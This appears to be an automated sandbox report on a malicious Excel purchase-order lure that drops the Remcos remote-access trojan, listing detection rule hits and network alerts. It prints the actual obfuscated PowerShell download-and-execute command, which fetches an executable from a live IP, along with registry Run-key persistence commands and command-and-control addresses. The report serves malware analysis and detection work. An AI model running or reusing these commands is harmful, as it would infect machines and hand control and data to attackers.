          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3660, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3924, ProcessName: mshta.exe
          Sigma detected: System File Execution Location Anomaly
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\dllhost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\dllhost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\dllhost.exe, NewProcessName: C:\Users\user\AppData\Roaming\dllhost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\dllhost.exe, ParentCommandLine: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4032, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\dllhost.exe" , ProcessId: 3308, ProcessName: dllhost.exe
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3084, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Chivey57
          Sigma detected: Direct Autorun Keys Modification
          Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1908, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ProcessId: 3084, ProcessName: reg.exe
          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4032, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", ProcessId: 3152, ProcessName: csc.exe
          Sigma detected: Excel Network Connections
          Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 104.21.78.54, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3660, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4032, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
          Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, ParentProcessId: 924, ParentProcessName: Vaccinerende.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ProcessId: 1908, ProcessName: cmd.exe
          Sigma detected: Suspicious Office Outbound Connections
          Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3660, Protocol: tcp, SourceIp: 104.21.78.54, SourceIsIpv6: false, SourcePort: 443
          Sigma detected: Dynamic CSharp Compile Artefact
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4032, TargetFilename: C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline
          Sigma detected: Modification of IE Registry Settings
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3660, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))", CommandLine: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR
          Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4032, TargetFilename: C:\Users\user\AppData\Local\Temp\lpwdliyh.bjz.ps1

          Data Obfuscation

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4032, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline", ProcessId: 3152, ProcessName: csc.exe

          Stealing of Sensitive Information

          barindex
          Sigma detected: Remcos
          Source: Registry Key setAuthor: Joe Security: Data: Details: 00 21 BC BC 23 53 AA E8 94 9B E0 2A 08 D0 4B 56 C2 2F A0 12 9A DA 0B CC 72 71 73 68 10 B5 BD 45 F4 15 E9 3D C8 20 16 66 6D 76 69 D1 DF 18 78 66 41 03 C0 AD 59 C2 23 8D A4 8B 34 7D 13 60 30 49 C4 1E C3 B2 19 6C E9 38 BA 4F 64 98 B2 7C A7 6C 16 CE E8 31 FA 4D 83 7C 50 F5 F3 3C E6 78 FA 25 98 10 1F 93 04 C3 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, ProcessId: 924, TargetObject: HKEY_CURRENT_USER\Software\Rmc-DSGECX\exepath

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-30T09:53:25.275410+020020241971A Network Trojan was detected192.3.220.2280192.168.2.2249164TCP
          2024-09-30T09:53:27.893933+020020241971A Network Trojan was detected192.3.220.2280192.168.2.2249166TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-30T09:53:25.270470+020020244491Attempted User Privilege Gain192.168.2.2249164192.3.220.2280TCP
          2024-09-30T09:53:27.893925+020020244491Attempted User Privilege Gain192.168.2.2249166192.3.220.2280TCP
          2024-09-30T09:53:50.060315+020020244491Attempted User Privilege Gain192.168.2.2249172192.3.220.2280TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-30T09:56:18.415693+020020365941Malware Command and Control Activity Detected192.168.2.2249174107.173.4.162404TCP
          2024-09-30T09:56:20.260276+020020365941Malware Command and Control Activity Detected192.168.2.2249175107.173.4.162404TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-30T09:56:20.741800+020028033043Unknown Traffic192.168.2.2249176178.237.33.5080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-30T09:56:14.719678+020028032702Potentially Bad Traffic192.168.2.2249173192.3.220.2280TCP
          2024-09-30T09:57:00.947013+020028032702Potentially Bad Traffic192.168.2.2249177192.3.220.2280TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: PO 11001 .xlsReversingLabs: Detection: 28%
          Source: PO 11001 .xlsVirustotal: Detection: 25%Perma Link
          Yara detected Remcos RAT
          Source: Yara matchFile source: 00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Vaccinerende.exe PID: 3116, type: MEMORYSTR
          Machine Learning detection for sample
          Source: PO 11001 .xlsJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,34_2_00404423
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49170 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49169 version: TLS 1.2
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.802145913.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Automation.pdb source: powershell.exe, 00000018.00000002.1002223931.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.pdb source: powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: .pdbu source: powershell.exe, 00000007.00000002.449310498.000000001C4D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.pdbhP source: powershell.exe, 00000007.00000002.434786957.000000000312A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbg source: powershell.exe, 0000000C.00000002.802145913.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.pdb source: powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: :\Windows\System.Core.pdbpdbore.pdb2 source: powershell.exe, 00000018.00000002.902448214.0000000000491000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\System.Core.pdbpdbore.pdbD7 source: powershell.exe, 0000000C.00000002.777378103.0000000000442000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.pdbhP source: powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: Automation.pdbG source: powershell.exe, 00000018.00000002.1002223931.0000000004F5A000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_0040595A
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_00402862 FindFirstFileW,11_2_00402862
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040658F FindFirstFileW,FindClose,11_2_0040658F
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,23_2_0040595A
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_00402862 FindFirstFileW,23_2_00402862
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 23_2_0040658F FindFirstFileW,FindClose,23_2_0040658F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,33_2_0040595A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_00402862 FindFirstFileW,33_2_00402862
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0040658F FindFirstFileW,FindClose,33_2_0040658F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0040AE51 FindFirstFileW,FindNextFileW,34_2_0040AE51
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,35_2_00407EF8
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,36_2_00407898
